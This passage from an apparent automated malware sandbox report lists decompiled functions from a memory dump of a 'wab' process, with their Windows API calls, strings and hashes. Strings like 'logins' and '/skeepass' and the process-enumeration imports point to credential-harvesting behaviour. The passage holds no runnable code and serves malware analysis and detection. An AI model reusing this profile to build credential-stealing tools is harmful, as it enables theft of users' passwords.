                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                  • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                  • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                  • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                  • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1043902810-0
                                                                                                                • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040E2AB Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                                                                                  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                • memset.MSVCRT ref: 0040E380
                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                                                                                • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                • memcpy.MSVCRT ref: 0040E3EC
                                                                                                                • memcpy.MSVCRT ref: 0040E407
                                                                                                                • memcpy.MSVCRT ref: 0040E422
                                                                                                                • memcpy.MSVCRT ref: 0040E43D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                                                                                • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                • API String ID: 3073804840-2252543386
                                                                                                                • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                • API String ID: 2899246560-1542517562
                                                                                                                • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0040DBCD
                                                                                                                • memset.MSVCRT ref: 0040DBE9
                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                • API String ID: 3330709923-517860148
                                                                                                                • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                • memset.MSVCRT ref: 0040806A
                                                                                                                • memset.MSVCRT ref: 0040807F
                                                                                                                • _wtoi.MSVCRT ref: 004081AF
                                                                                                                • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                • memset.MSVCRT ref: 004081E4
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                  • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                  • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                  • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                  • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                • String ID: logins$null
                                                                                                                • API String ID: 3492182834-2163367763
                                                                                                                • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                • memset.MSVCRT ref: 004085CF
                                                                                                                • memset.MSVCRT ref: 004085F1
                                                                                                                • memset.MSVCRT ref: 00408606
                                                                                                                • strcmp.MSVCRT ref: 00408645
                                                                                                                • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                • memset.MSVCRT ref: 0040870E
                                                                                                                • strcmp.MSVCRT ref: 0040876B
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                • String ID: ---
                                                                                                                • API String ID: 3437578500-2854292027
                                                                                                                • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 0041087D
                                                                                                                • memset.MSVCRT ref: 00410892
                                                                                                                • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1010922700-0
                                                                                                                • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                • malloc.MSVCRT ref: 004186B7
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                • malloc.MSVCRT ref: 004186FE
                                                                                                                • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                • String ID: |A
                                                                                                                • API String ID: 4233704886-1717621600
                                                                                                                • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsicmp
                                                                                                                • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                • API String ID: 2081463915-1959339147
                                                                                                                • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                • API String ID: 2012295524-70141382
                                                                                                                • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0041383D Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 44libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule
                                                                                                                • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                                • API String ID: 667068680-3953557276
                                                                                                                • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                                                                                • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                                                                                • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                  • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                  • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                  • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                • memcpy.MSVCRT ref: 0041234D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1700100422-0
                                                                                                                • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2643341095.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                • String ID:
                                                                                                                • API String ID: 552707033-0
                                                                                                                • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
